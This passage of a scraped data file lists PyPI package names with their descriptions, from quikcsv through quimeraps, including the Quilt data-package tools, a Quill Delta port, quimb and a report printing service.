yaml)python./run.pyarg1--mode:my_custom_mode'constants: { tau: 6.2831853072, pi: 3.1415926, reserved_letters: [ \"C\", \"K\", \"i\" ] }'prints:config:{\"mode\":\"my_custom_mode\",\"has_gpu\":False,\"constants\":{\"pi\":3.1415926,\"tau\":6.2831853072,\"reserved_letters\":[\"C\",\"K\",\"i\",],},}unused_args:[\"arg1\"]"} +{"package": "quikcsv", "pacakge-description": "QuikCSVPython package for quickly creating temporary csv files to help with testing. The CSV file exists in memory only so you can create files on the fly without needing to cleanup or delete files later. No need to use with statements or close resources, that is taken care of.InstallationNot ready just yet.SampleTake a function that takes an open CSV file as its argument. 
Instead of creating and opening an actual CSV file on the disk, decorate the function.fromquikcsvimportQuikCSV@QuikCSV([dict(data=[['Column A','Column B','Column C'],['100','101','102']])])defcsv_func(csv_file):# Work with csv file here.## QuikCSV.one will map the data above to mimic a csv file with the# respective columns and rows, passing the file to the csv_file argument# (or by default, the first argument if there are multiple.)If you want, you can specify the argument that the CSV mock file will be passed to.@QuikCSV([dict(data=[['Column A','Column B','Column C'],['100','101','102']],arg='csv_file')])defcsv_func(first_arg,csv_file,third_arg):# Mock CSV will be accessible on the csv_file variable.Options can be passed via the opts argument to quickly generate additional rows of data from existing rows.@QuikCSV([dict(data=[['Column A','Column B','Column C'],['100','101','102']],opts=dict(add_rows=2,row_pattern='copy',base_row_index=1))])defcsv_func(csv_file):# Output csv file will look like this:## Column A, Column B, Column C# 100, 101, 102# 100, 101, 102# 100, 101, 102## 2 rows of data are added, copied from index 1 of the passed data.'copy' is a predefined row creation pattern to make things easy, but you can also pass a custom function@QuikCSV([dict(data=[['Column A','Column B','Column C'],['100','101','102']],opts=dict(add_rows=2,row_pattern=lambdax:[n+1forninx],base_row_index=1))])defcsv_func(csv_file):# Output csv file will look like this:## Column A, Column B, Column C# 100, 101, 102# 101, 102, 103# 101, 102, 103## The passed function should apply against the row of data, not the# individual element.The above example applies the same function to the same row again and again, but by setting the 'incremental' option to True, the function will apply the newly created row of data on the next iteration.@QuikCSV([dict(data=[['Column A','Column B','Column C'],['100','101','102']],opts=dict(add_rows=2,row_pattern=lambdax:[n+1forninx],base_row_index=1,increment=True))])defcsv_func(csv_file):# Output csv file will look like this:## Column A, Column B, Column C# 100, 101, 102# 101, 102, 103# 102, 103, 104#Features in the worksRandom data generation - completely random or pseudo-random via user defined options"} +{"package": "quikenv", "pacakge-description": "QuikenvThis was wrapper around the python dot-env project athttps://github.com/theskumar/python-dotenvhttps://pypi.org/project/python-dotenv/Here is the pypi release I made:https://pypi.org/project/quikenv/I really liked the project but wanted something even more lazy. All credit goes to the original developers. 
I only added features I wanted on top of an already really great project.This wrapper has the following features:A ezload() classmethod that automatically looks for for your .env file in the current working directory and 2 dirs upimport quikenv\n\nenv = quikenv.ezload()\nvar = env.get(\"my_environment_var\")\nprint(env.environment_variables)A proper_load() classmethod that will load this class with a given file pathimport quikenv\n\nenv_path = \"C:/somedir/.env\"\nenv = quikenv.proper_load(env_path)\nvar = env.get(\"my_environment_var\")\nprint(env.environment_variables)A normal procedural start for the classimport quikenv\n\nenv_path = \"C:/somedir/.env\"\nenv = quickenv.Quikenv(env_path)\nenv.load()\nvar = env.get(\"my_environment_var\")\nprint(env.environment_variables)A lot of safety features (I don't think speed is relevant here):Errors out when you give it an invalid file path to the .env fileWill NOT add values from your computer and will only use values from your .env fileErrors out when you try to get a value that doesn't exist or has am empty valueMy years of programming has taught me that I'm still stupid enough to do this. You probably are too.At least you get told now when something is null/empty instead of spending 2 hours debugging your idiocy."} +{"package": "quikey", "pacakge-description": "No description available on PyPI."} +{"package": "quikkly-python-sdk", "pacakge-description": "# Quikkly Python SDK #Note: to use this Python SDK, you need the Quikkly core native library.\nPlease contactdavid@quikklycodes.comfor more information and pricing.## Install ##pip install quikkly-python-sdk## Dependencies ##Python 2.7 or 3.6.Generating SVG codes has no dependencies besides the qukklycore native library files. Generating PNG and JPEG codes requires installing the ImageMagick library with librsvg support.Scanning codes from images also requires thenumpyandPillowPython packages.## Version History ##3.4.9 - Add quikkly.get_template_info() method and command-line script to export blueprint metadata. This includes also the maximum data values which are not present in the file itself. Update to require Quikkly core libs v3.4.9.3.4.8 - Fix setup.py3.4.7 - Renamedquikkly-generate-svg.pytoquikkly-generate-code.py. Add support for PNG and JPEG output formats if ImageMagick is installed.3.4.6 - Fix compatibility with Quikkly core libs v3.4.5 for scanning.3.4.5 - Update to Quikkly core libs v3.4.5. No Python SDK changes.3.4.3 - Update to Quikkly core libs v3.4.3. No Python SDK changes.3.4.1 - Update to Quikkly core libs v3.4.1. No Python SDK changes.3.3.4 - Update to Quikkly core libs v3.3.4. No Python SDK changes.3.3.2 - Update to Quikkly core libs v3.3.2. No Python SDK changes.3.2.1 - Add support for encoding/decoding data values as alphanumeric strings.3.2.0 - Update to Quikkly core libs v3.2.0, reverting some style changes to templates. No Python SDK changes.3.1.0 - Update to Quikkly core libs v3.1.0, with more styling options and templates. 
No Python SDK changes.1.0.0 - Support for generating SVG codes, scanning images, plus command-line scripts for both.0.1.0 - First Release.## Making a Release ##Check that setup.py version has been updated to new version,Check that README.md version history has been updated,Check that quikklycore.py version has been updated to compatible native lib versions,Check that you are in a virtualenv with python3 as default,Run ./pypi-upload.sh"} +{"package": "quik-LIMOJ", "pacakge-description": "No description available on PyPI."} +{"package": "quiktools", "pacakge-description": "No description available on PyPI."} +{"package": "quil", "pacakge-description": "Quil\u26a0\ufe0f In DevelopmentThequilpackage provides tools for constructing, manipulating, parsing, and printingQuilprograms. Internally, it is powered byquil-rs.This package is still in early development and breaking changes should be expected between minor versions.DocumentationDocumentation for the current release ofquilis publishedhere. Every version ofquilshipswith type stubsthat provide type hints and documentation to Python tooling and editors that support theLanguage Server Protocolor similar."} +{"package": "quilbert", "pacakge-description": "IntroductionQuilbert: A Python AI Voice Assistant with State Machine DesignQuilbert is a GPT powered AI voice assistant built using Python.\nThis project utilizes a state machine design pattern to efficiently handle user input, process it, and provide relevant responses.\nWith Quilbert, you can easily access information, ask questions, and receive helpful responses using only your voice.To get started with Quilbert, follow these steps:$ pip install Quilbert\n$ quilbert --debugOnce running, Quilbert will begin listening for the wakeword \"porcupine\". When you say \"porcupine\", Quilbert will become active and start listening for your questions or commands.Please note some common issues you might encounter:OpenAI API not set: Configure your OpenAI API key by runningexport OPENAI_API_KEY=.Picovoice access key not set: Set up your Picovoice access key usingexport PICOVOICE_ACCESS_KEY=.Pyaudio import fails because portaudio is not installed: Install portaudio usingbrew install portaudioon mac.Architecture OverviewQuilbert's architecture is based on a state machine with three primary states: sleeping, listening, and processing.\nThe state diagram for Quilbert's architecture can be visualized using Mermaid:stateDiagram\nsleeping --> listening\nlistening --> processing\nprocessing --> listening\nprocessing --> sleepingBy using this state machine design, Quilbert efficiently handles user interactions, providing a seamless and responsive voice assistant experience.Sleeping stateIn the sleeping state, Quilbert processes audio chunks, listens for the wakeword, and discards the audio data.\nThe transitions are as follows:Sleeping to listening: Triggered when the wake word is detected.Listening stateWhen in the listening state, Quilbert processes audio chunks, listens for voice activity, and stores the chunks in a buffer. 
The possible transitions are:Listening to sleeping: Triggered when no processing occurs after two minutes of listening.Listening to processing: Triggered when voice activity is detected for 0.25 seconds, followed by one second of inactivity.Processing stateIn the processing state, Quilbert takes the following actions:Converts the buffered audio to text.Fetches a response from the AI model.Plays the response using text-to-speech synthesis.The transitions from processing state are:Processing to sleeping: Triggered when the user says \"stop\" or another stop phrase.Processing to listening: Triggered immediately after processing is complete."} +{"package": "quilc", "pacakge-description": "No description available on PyPI."} +{"package": "quill", "pacakge-description": "No description available on PyPI."} +{"package": "quilla", "pacakge-description": "QuillaDeclarative UI Testing with JSONQuilla is a framework that allows test-writers to perform UI testing using declarative syntax through JSON files. This enables test writers, owners, and maintainers to focus not on how to use code libraries, but on what steps a user would have to take to perform the actions being tested. In turn, this allows for more agile test writing and easier-to-understand test cases.Quilla was built to be run in CI/CD, in containers, and locally. It also comes with an optional integration withpytest, so you can write your Quilla test cases as part of your regular testing environment for python-based projects. Check out thequilla-pytestdocs for more information on how to configurepytestto auto-discover Quilla files, adding markers, and more.Check out thefeaturesdocs for an overview of all quilla can do!QuickstartRunpip install quillaEnsure that you have the correct browser and drivers. Quilla will autodetect drivers that are in your PATH or in the directory it is calledWrite the following asValidation.json, substituting \"Edge\" for whatever browser you have installed and have the driver for:{\"targetBrowsers\":[\"Edge\"],\"path\":\"https://www.bing.com\",\"steps\":[{\"action\":\"Validate\",\"type\":\"URL\",\"state\":\"Contains\",\"target\":\"bing\"}]}Runquilla -f Validation.jsonInstallationNote: It ishighly recommendedthat you use a virtual environment whenever you install new python packages.\nYou can install Quilla by cloning the repository and runningmake install.Quilla is available onPyPI, and can be installed by runningpip install quilla.For more information on installation options (such as installing from source) and packaging Quilla for remote install, check out the documentation for ithereWriting Validation FilesCheck out the documentation for ithereContext ExpressionsThis package is able to dynamically inject different values, exposed through context objects and expressions whenever the validation JSON would ordinarily require a regular string (instead of an enum). This can be used to grab values specified either at the command-line, or through environment variables.More discussion of context expressions and how to use them can be found in the documentation filehereGenerating DocumentationDocumentation can be generated through themakecommandmake docsCheck out the documentation for ithereMake commandsA Makefile is provided with several convenience commands. 
You can find usage instructions withmake help, or below:Usage:\n make [target]\n\nTargets:\n help Print this help message and exit\n package Create release packages\n package-deps Create wheel files for all runtime dependencies\n docs Build all the docs in the docs/_build directory\n clean-python Cleans all the python cache & egg files files\n clean-docs Clean the docs build directory\n clean-build Cleans all code build and distribution directories\n clean Cleans all build, docs, and cache files\n install Installs the package\n install-docs Install the package and docs dependencies\n install-tests Install the package and test dependencies\n install-all Install the package, docs, and test dependenciesContributingThis project welcomes contributions and suggestions. Most contributions require you to agree to a\nContributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us\nthe rights to use your contribution. For details, visithttps://cla.opensource.microsoft.com.When you submit a pull request, a CLA bot will automatically determine whether you need to provide\na CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions\nprovided by the bot. You will only need to do this once across all repos using our CLA.This project has adopted theMicrosoft Open Source Code of Conduct.\nFor more information see theCode of Conduct FAQor\ncontactopencode@microsoft.comwith any additional questions or comments.TrademarksThis project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft\ntrademarks or logos is subject to and must followMicrosoft's Trademark & Brand Guidelines.\nUse of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship.\nAny use of third-party trademarks or logos are subject to those third-party's policies."} +{"package": "quillbot-cat", "pacakge-description": "# frase_api"} +{"package": "quilldelta", "pacakge-description": "No description available on PyPI."} +{"package": "quill-delta", "pacakge-description": "Delta (Python Port)Python port of the javascript Delta library for QuillJS:https://github.com/quilljs/deltaSome basic pythonizing has been done, but mostly it works exactly like the above library.There is no other python specific documentation at this time, sorry. Please see the tests\nfor reference examples.Install withPoetryWith HTML rendering:> poetry add -E html quill-deltaWithout HTML rendering:> poetry add quill-deltaInstall with pipNote: If you're usingzsh, see below.With HTML rendering:> pip install quill-delta[html]With HTML rendering (zsh):> pip install quill-delta\"[html]\"Without HTML rendering:> pip install quill-deltaRendering HTML in PythonThis library includes a moduledelta.htmlthat renders html from an operation list,\nallowing you to render Quill Delta operations in full from a Python server.For example:from delta import html\n\nops = [ \n { \"insert\":\"Quill\\nEditor\\n\\n\" },\n { \"insert\": \"bold\",\n \"attributes\": {\"bold\": True}},\n { \"insert\":\" and the \" },\n { \"insert\":\"italic\",\n \"attributes\": { \"italic\": True }},\n { \"insert\":\"\\n\\nNormal\\n\" },\n]\n\nhtml.render(ops)Result (line formatting added for readability):

<p>Quill<br/>Editor<br/><br/></p>
<p><strong>bold</strong> and the <em>italic</em><br/></p>
<p>Normal<br/></p>
See test_html.pyfor more examples.DevelopingSetupIf you'd to contribute to quill-delta-python, get started setting your development environment by running:Checkout the repository> git clone https://github.com/forgeworks/quill-delta-python.gitMake sure you have python 3 installed, e.g.,> python --versionFrom inside your new quill-delta-python directory:> python3 -m venv env\n> source env/bin/activate\n> pip install poetry\n> poetry install -E htmlTestsTo run tests do:> py.test"} +{"package": "quillix", "pacakge-description": "Quillix is a Python package designed for local database management using JSON as the underlying storage format. With Quillix, users can seamlessly create, manage, and query databases through a simplified interface. The package provides a convenient way to perform basic database operations, execute SQL-like queries, and manage data with ease.Usageimport quillix as qx, then just call the query() function like, qx.query(\"your query\").Note: 1. \"Alter table\" has only column based operations which include \"drop\", \"rename\", \"add\".\n 2. In \"update table\" syntax, \"column1 = column1 + value\" is written as \"column1 + value\".\n 3. Syntax does not include semi-colon(;) in the end.\n 4. Enclose conditions after \"where\" keyword with brackets.\n Example, \"select * from table_name where ((column1 > 5) or (column2 == hello world))\"\n 5. while using \"group by\" or \"order by\" clause, no need to mention the grouping or sorting columns in the column details between \"select\" and \"from\" keyword.\n 6. \"Join\" does not work, however you can use object based syntax.\n Example, \"select count(b.col4) from a testTable, b testTable2 where (a.col2 == b.col5) group by a.col1\"When you create a database, you will find a data.json file being created in your project directory. It will store all the data that you put in your database.Complete documentation will be available in a few days."} +{"package": "quills.app", "pacakge-description": "==========quills.app==========This package is a part of the Quills Blogging Suite. It contains codeshared between Products.Quills and Products.QuillsEnabled.For further information about Quills, see package https://github.com/collective/Products.Quills.Changelog=========1.8.1 (2016-12-27)----------------- add Plone version classifiers[tkimnguyen]- include all needed files[skurfer]1.8 (2012-12-17)----------------- Plone 4.3 compatibility[ale-rt]- Handle case when attribute parentsInThread does not exist on comment[tkimnguyen]1.8a1 (2011-03-30)------------------- Compatibility with Plone 4 [sargo] (r100977_, r100979_)- Fixed problem where blog's topics view acquired an object with the tag namefrom higher up instead of showing blogs with that tag. [jcbrand] (r232360_)For older entries, please see Products.Quills/Products.QuillsEnabled for a changes."} +{"package": "quills.core", "pacakge-description": "This package is a part of the Quills Blogging Suite. It contains Core weblog\ninterfaces and views.For further information about Quills, see package Products.Quills.ChangelogSee package Products.Quills/Products.QuillsEnabled for a changelog."} +{"package": "quillsql", "pacakge-description": "Quill Python SDKQuickstartFirst, install the quillsql package by running:$pipinstallquillsqlThen, add a/quillendpoint to your existing python server. 
For example, if\nyou were running a FASTAPI app, you would just add the endpoint like this:fromquillsqlimportQuillfromfastapiimportFastAPI,Requestapp=FastAPI()quill=Quill(private_key=,database_connection_string=,)# ... your existing endpoints here ...@app.post(\"/quill\")asyncdefquill_post(data:Request):body=awaitdata.json()returnquill.query(org_id=\"2\",data=body)Then you can run your app like normally. Pass in this route to our react library\non the frontend and you all set!For local testing (dev purposes only)pipenv install\npipenv shell\nuvicorn examples.fastapi-server.app:app --reload --port 3000You are now ready to ping your local server athttp://localhost:3000.TroubleshootingIf you run into issues withLibrary not loaded: @rpath/libpq.5.dyliborno LC_RPATH's found, try uninstalling and reinstalling postgres on your machine. For example, using homebrew:$brewuninstallpostgresql\n$brewupdate\n$brewinstallpostgresqlIf you're still having this issue, this resource might also be useful for you:https://www.psycopg.org/docs/install.html."} +{"package": "quills.remoteblogging", "pacakge-description": "UNKNOWN"} +{"package": "quilt", "pacakge-description": "quiltis a command-line utility that builds, pushes, and installs\ndata packages. Adata packageis a versioned bundle of serialized data wrapped in a Python module.quiltpushes to and pulls from the package registry at quiltdata.com.Visitquiltdata.comfor docs and more."} +{"package": "quilt3", "pacakge-description": "Quilt manages data like code (with packages, repositories, browsing and\nrevision history) so that teams can experiment faster in machine learning,\nbiotech, and other data-driven domains.Thequilt3PyPI package allows you to build, push, and install data packages.\nVisit thedocumentation quickstartto learn more."} +{"package": "quilt3distribute", "pacakge-description": "quilt3distributePeople commonly work with tabular datasets, people want to share their data, this makes that easier through Quilt3.FeaturesAutomatically determines which files to upload based off CSV headers. 
(Explicit override available)Simple interface for attaching metadata to each file based off the manifest contents.Groups metadata for files that are referenced multiple times.Validates and runs basic cleaning operations on your dataset manifest CSV.Optionally add license details and usage instructions to your dataset README.Parses README for any referenced files and packages them up as well.Support for adding extra files not contained in the manifest.Constructs an \"associates\" map that is placed into each files metadata for quick navigation around the package.Enforces that the metadata attached to each file is standardized across the package for each file column.Quick StartConstruct a csv (or pandas dataframe) dataset manifest (Example):CellIdStructure2dReadPath3dReadPath1lysosome2d/1.png3d/1.tiff2laminb12d/2.png3d/2.tiff3golgi2d/3.png3d/3.tiff4myosin2d/4.png3d/4.tifffromquilt3distributeimportDataset# Create the datasetds=Dataset(dataset=\"single_cell_examples.csv\",name=\"single_cell_examples\",package_owner=\"jacksonb\",readme_path=\"single_cell_examples.md\")# Optionally add common additional requirementsds.add_usage_doc(\"https://docs.quiltdata.com/walkthrough/reading-from-a-package\")ds.add_license(\"https://www.allencell.org/terms-of-use.html\")# Optionally indicate column values to use for file metadatads.set_metadata_columns([\"CellId\",\"Structure\"])# Optionally rename the columns on the package levelds.set_column_names_map({\"2dReadPath\":\"images_2d\",\"3dReadPath\":\"images_3d\"})# Distributepkg=ds.distribute(push_uri=\"s3://quilt-jacksonb\",message=\"Initial dataset example\")Returns:(remote Package)\n \u2514\u2500README.md\n \u2514\u2500images_2d\n \u2514\u250003cdf019_1.png\n \u2514\u2500148ddc09_2.png\n \u2514\u25002b2cf361_3.png\n \u2514\u2500312a0367_4.png\n \u2514\u2500images_3d\n \u2514\u2500a0ce6e01_1.tiff\n \u2514\u2500c360072c_2.tiff\n \u2514\u2500d9b55cba_3.tiff\n \u2514\u2500eb29e6b3_4.tiff\n \u2514\u2500metadata.csv\n \u2514\u2500referenced_files\n \u2514\u2500some_file_referenced_by_the_readme.pngExample Metadata:pkg[\"images_2d\"][\"03cdf019_1.png\"].meta{\"CellId\":1,\"Structure\":\"lysosome\",\"associates\":{\"images_2d\":\"images_2d/03cdf019_1.png\",\"images_3d\":\"images_3d/a0ce6e01_1.tiff\"}}InstallationStable Release:pip install quilt3distributeDevelopment Head:pip install git+https://github.com/AllenCellModeling/quilt3distribute.gitCreditsThis package was created with Cookiecutter.Original repositoryFree software: Allen Institute Software License"} +{"package": "quilt3-local", "pacakge-description": "Quilt3 catalog: Local development modeOpen source implementation of the Quilt3 registry that works in the local\nenvironment (not requiring AWS cloud services aside from S3 / S3 Select).This package is not intended to be installed/used directly by end users.\nInstead, installquilt3[catalog]and usequilt3 catalogCLI command.DevelopingTL;DR# set up venv, assuming poetry is available in the PATHpoetryinstall# build catalog bundle(cd../catalog&&npmi&&npmrunbuild&&cp-rbuild../quilt3_local/quilt3_local/catalog_bundle)# run the app at http://localhost:3000poetryrunquilt3-localSet-upPython environment set-upFirst, you needpoetryinstalled.Then, you have to set up the virtualenv by runningpoetry installfrom the\nproject directory -- it will create a virtualenv and install the requirements.Catalog (node.js) environment set-upRefer to thecatalog documentation.RunningYou can either serve a static catalog bundle (produced bynpm run build) or\nproxy static files from a 
running catalog instance.NOTE: you need valid AWS credentials available, seeboto3 docsfor details.Serving a static catalog bundleRunpoetry run quilt3-localto start the app on port 3000 serving the static\ncatalog bundle from the./quilt3_local/catalog_bundledirectory.\nPath to the bundle can be overriden byQUILT_CATALOG_BUNDLEenv var.\nPort can be configured viaPORTenv var.In order to serve the bundle, you should first build it by runningnpm run buildfrom the catalog directory and then either copying it to./quilt3_loca/catalog_bundleor overridingQUILT_CATALOG_BUNDLEto point to\nyour bundle.\nHowever, this approach is not very convenient when developing catalog features,\nsince it requires rebuilding the bundle to pick up the changes.\nTo address this there's a \"proxy\" mode available.Proxying a running catalog instanceIn this mode the app proxies all the static files requests to a running catalog\ninstance. One can be started by executingPORT=3001 npm startfrom the catalog\ndirectory (setting port to3001required to avoid conflict with thequilt3_localapp's default settings).After starting up a catalog instance, you can start thequilt3_localapp and\npoint it to that instance by runningQUILT_CATALOG_URL=http://localhost:3001 poetry run quilt3-local(the app will be available athttp://localhost:3000and will serve static\nfiles from the catalog running athttp://localhost:3001, catalog URL\nconfigurable viaQUILT_CATALOG_URLenv var).Building and publishingMake sure you set upcredentials forpoetryBump package version inpyproject.tomland updateCHANGELOG.mdUpdate catalog commit hash incatalog-commitif requiredCommit, tag, push:git c -am \"release X.Y.Z\" && git tag vX.Y.Z && git push && git push --tagsBuild and publish the package:make publish"} +{"package": "quiltcore", "pacakge-description": "QuiltCoreQuiltCore is a library for building and runningQuiltdata packages.\nIt is designed to leverage standard open source technology and YAML configuration files\nso that it can easily be ported to other languages and platforms.This initial implementation is in Python.Key TechnologiesApacheArrowfor reading, writing, and representing manifestsPyArrowfor Python bindings to Arrowfsspecfilesystemsfor reading and writing files from various sourcesPyYAMLfor reading and writing YAML configuration filesExamplepoetryinstall#!/usr/bin/env pythonimportosfromquiltcoreimportDomain,UDIfromtempfileimportTemporaryDirectoryfromupathimportUPathTEST_BKT=\"s3://quilt-example\"TEST_PKG=\"akarve/amazon-reviews\"TEST_TAG=\"1570503102\"TEST_HASH=\"ffe323137d0a84a9d1d6f200cecd616f434e121b3f53a8891a5c8d70f82244c2\"TEST_KEY=\"camera-reviews\"WRITE_BKT=os.environ.get(\"WRITE_BUCKET\")SOURCE_URI=f\"quilt+{TEST_BKT}#package={TEST_PKG}:{TEST_TAG}\"DEST_URI=f\"quilt+{TEST_BKT}#package={TEST_PKG}:{TEST_TAG}\"Get Manifestremote=UDI.FromUri(SOURCE_URI)print(f\"remote:{remote}\")withTemporaryDirectory()astmpdir:local=UPath(tmpdir)domain=Domain.FromLocalPath(local)print(f\"domain:{domain}\")folder=domain.pull(remote)print(f\"folder:{folder}\")ifWRITE_BKT:tag=domain.push(folder,remote=UDI.FromUri(DEST_URI))print(f\"tag:{tag}\")"} +{"package": "quilter", "pacakge-description": "QuilterThe composer of Matplotlib plots. Python implementation of the R package patchwork.This package overloads/creates operators for the matplotlib Figure class so that you can add and divide figures together into a new figure with subplots.Adding two figures together creates a new figure with the original figures side-by-side as subplots. 
Dividing will stack the figured on top of each other.Currently the package converts the input figures to images before reloading the images into the axes objects of the output figure. If anyone has a better way to copy actual axes objects to a new figure I'd loved help.Here are some examples:import matplotlib.pyplot as plt\nimport quilter # best to put this after your matplotlib import\n\nfig1, ax1 = plt.subplots(figsize=(5,3))\nax1.plot([1, 2], label='my leg')\nax1.set_title(\"test\")\nax1.legend()\n\nfig2, ax2 = plt.subplots(figsize=(5,3))\nax2.plot([2, 2])\nax2.set_title(\"test 2\")Adding figures togetherout = fig1 + fig2Dividing figuresout = fig1 / fig2More complex examplesout = (fig1 + fig2) / fig2\n\nout = (fig1 + fig2) / (fig1 + fig2)"} +{"package": "quilt-installer", "pacakge-description": "Administration tool for Quilt Data infrastructure stacks."} +{"package": "quilt-lang", "pacakge-description": "A Python library that lets you write less code to do more things.Documentation availablehere.Getting startedInstall via pippipinstallquilt-langImportingimportquilt_langas_Example usageif_.ready:print(\"Quilt is ready.\")For more commands, visitthis website.How you can make Quilt betterAt the moment, you can help byAdding more functions which you or someone else might find usefulAdding and maintaining the docstringsAdding and improving unit testsLicenseQuilt is licensed under theApache 2.0 License."} +{"package": "quiltplus", "pacakge-description": "QuiltPlusNext-generation API for Quilt Universal Data CollectionsQuiltPlus provides an asychronous, object-oriented wrapper around the Quilt API.\nIn particular, it implements a resource-based architecture using Quilt+ URIs in\norder to support the Universal Data Clientudc.Installationpython3-mpipinstallquiltplusUsagefromquiltplusimportQuiltPackageimportanyioURI=\"quilt+s3://quilt-example#package=examples/wellplates\"asyncdefprint_contents(uri:str):pkg=QuiltPackage.FromURI(URI)files=awaitpkg.list()print(files)anyio.run(print_contents,URI)"} +{"package": "quilt-py", "pacakge-description": "hello!"} +{"package": "quilt-stack-installer", "pacakge-description": "Command-line tool for installing Quilt as a CloudFormation stack."} +{"package": "quiltsync", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quiltz", "pacakge-description": "Quiltz is deprecatedPlease usequiltz-domain"} +{"package": "quiltz-domain", "pacakge-description": "quiltz-domainPython domain concepts for quiltzPurposeAtQWANwe're building some applications in Python. We collect useful stuff in\nthe different Quiltz projects:quiltz-domain(this package) contains domain oriented support modules like entity\nids, results, email anonymization, validators and parsersquiltz-testsupportcontains test support modules, that supports e.g. automated testing for SMTP integration, probing asynchronous results and\nasserting log statementsquiltz-messagingcontains a\nmessaging domain concept and an engines to send messages. Currently only\nsending emails over SMTP is supported.Installingpipinstallquiltz-domainSeedocumentation"} +{"package": "quiltz-messaging", "pacakge-description": "quiltz-messagingpython (email) messaging packagePurposeAt QWAN, we're building some applications in python. 
We collect useful stuff in\nquiltz packages:quiltz-domaincontains domain\nlevel modules like, entity id's, results, an email anonymizer, validators and\nparsersquiltz-testsupportcontains test support modules, that supports mainly non unit tests, like\nintegrating with smtp, probing asynchronous results and asserting log\nstatementsquiltz-messaging(this package) contains a messaging domain concept and an\nengine(s) to send the messages. Currently, only smtp sending is supported.installingpipinstallquitlz-messagingseedocumentation"} +{"package": "quiltz-testsupport", "pacakge-description": "quiltz-testsupportA package for test supportPurposeAtQWANwe're building some applications in python. We collect usefull stuff in quiltz packages:quiltz-domaincontains domain\nlevel modules like, entity id's, results, an email anonymizer, validators and\nparsersquiltz-testsupport(this package) contains test support modules, that supports mainly non\nunit tests, like integrating with smtp, probing asynchronous results and\nasserting log statementsquiltz-messagingcontains a\nmessaging domain concept and an engines to send the messages. Currently only\nsmtp sending is supported.Modules in this packageloggingWith the logging module you can assert log statements in a test using thelog_collectorfixture:in test:fromquiltz.testsupportimportlog_collectordeftest_logs_hello(log_collector):foo()log_collector.assert_info('hello info')in productiondeffoo():logger=logging.getLogger()logger.info('hello info')probingWith the probing module you can probe for async results:fromhamcrestimportassert_that,equal_tofromquiltz.testsupportimportprobe_thatdeftest_stub_server_collects_message_for_recepient(self):message=aMessage(recipient='rob@mailinator.com',sender='no-reply@qwan.eu',subject='test',body='hello test')self.message_engine.send([message])probe_that(lambda:self.server.messages==[stringified_message(message)])# orprobe_that(lambda:assert_that(self.server.messages,equal_to([stringified_message(message)])))# orprobe_that(lambda:self.server.messages,equal_to([stringified_message(message)]))smtpWith the smtp module you can create a stub smtp server that collects smtp messagesfromhamcrestimportassert_that,equal_tofromquiltz.testsupportimportprobe_thatdefserver()server=StubSmtpServer(hostname='localhost',port=9925)server.start()yield(server)server.stop()deftest_collects_message_for_recepient(self,server):message_engine=SMTPClientForTest(host='localhost',port='9925')message=aMessage(recipient='rob@mailinator.com',sender='no-reply@qwan.eu',subject='test',body='hello test')message_engine.send([message])probe_that(lambda:assert_that(server.messages,equal_to([stringified_message(message)])))installingpipinstallquiltz-testsupport"} +{"package": "quimb", "pacakge-description": "quimbis an easy but fast python library for'quantum information many-body'calculations, focusing primarily ontensor networks. The code is hosted ongithub, and docs are hosted onreadthedocs. Functionality is split in two:Thequimb.tensormodule contains tools for working withtensors and tensor networks. It has a particular focus on automatically handling arbitrary geometry, e.g. beyond 1D and 2D lattices. 
With this you can:construct and manipulate arbitrary (hyper) graphs of tensor networksautomaticallycontract, optimize and draw networksuse various backend array libraries such asjaxandtorchviaautorayrun specific MPS, PEPS, MERA and quantum circuit algorithms, such as DMRG & TEBDThe corequimbmodule contains tools for reference'exact'quantum calculations, where the states and operator are represented as eithernumpy.ndarrayorscipy.sparsematrices. With this you can:construct operators in complicated tensor spacesfind groundstates, excited states and do time evolutions, including withslepccompute various quantities including entanglement measurestake advantage ofnumbaaccelerationsstochastically estimate $\\mathrm{Tr}f(X)$ quantitiesThefull documentationcan be found at:quimb.readthedocs.io. Contributions of any sort are very welcome - please see thecontributing guide.Issuesandpull requestsare hosted ongithub. For other questions and suggestions, please use thediscussions page."} +{"package": "quimera", "pacakge-description": "Pentesting and OSINT Tool Kit for Ethical Hacking"} +{"package": "quimeraps", "pacakge-description": "Quimera printing service is a jon-rpc server that processes jasperreports reports and fills them with the information received through calls to the service.It consists of 3 parts:\n-server. Json-rpc server processing calls\n-customer. PyQt6 interface in charge of viewing the status of the server and managing printers and models.\n-daemon. Allows you to install and / or remove the quimera service on the host operating system.Installation:\nRequirements:Java JRE 9 (tested with OpenJDK 11 on windows) (Set JAVA_HOME in environment variables)Ghostscript (tested with 9.55 on windows)GitWindows.\nIn console with administrator privileges we execute:\npip install quimeraps\npip install git+https://github.com/acesseonline/pyreportjasper@master#egg=pyreportjasperLinux\nsudo -H pip3 install quimeraps\nsudo -H pip3 install git+https://github.com/acesseonline/pyreportjasper@master#egg=pyreportjasperService installation (Linux):\nquimeraps_daemon install. This service can be managed in the style of service quimeraps [start, stop, restart]Service installation (Windows):\nDownload NSSM fromhttps://nssm.cc/downloadUse \"nssm.exe install QuimeraPrintService\". Set quimeraps_server path and accept.Uninstall service (Linux):\nquimeraps_daemon removeIf we want to launch a server manually through the console:We must make sure that there are no other quimera servers running on the machine.We run quimeraps_server with administrator privileges.Using reports:\nThe reports must be located:(Linux) /opt/quimeraPS/reports(Windows) ...\\ProgramFiles\\quimeraPS\\reportsRegistration of models and printer.\nFor easy management of models and printers, quimeraps_client has been provided, which allows visually mapping existing printers and models with aliases recognized by the client.The log can be found in:(Linux) /var/log/quimeraps.log(Windows) ...\\ProgramFiles\\quimeraPS\\quimera.logYou can enable the use of chimeraps with ssl as follows:Inside the chimeraPS folder, we create the cert folder and add the ssl.cert and ssl.key files. 
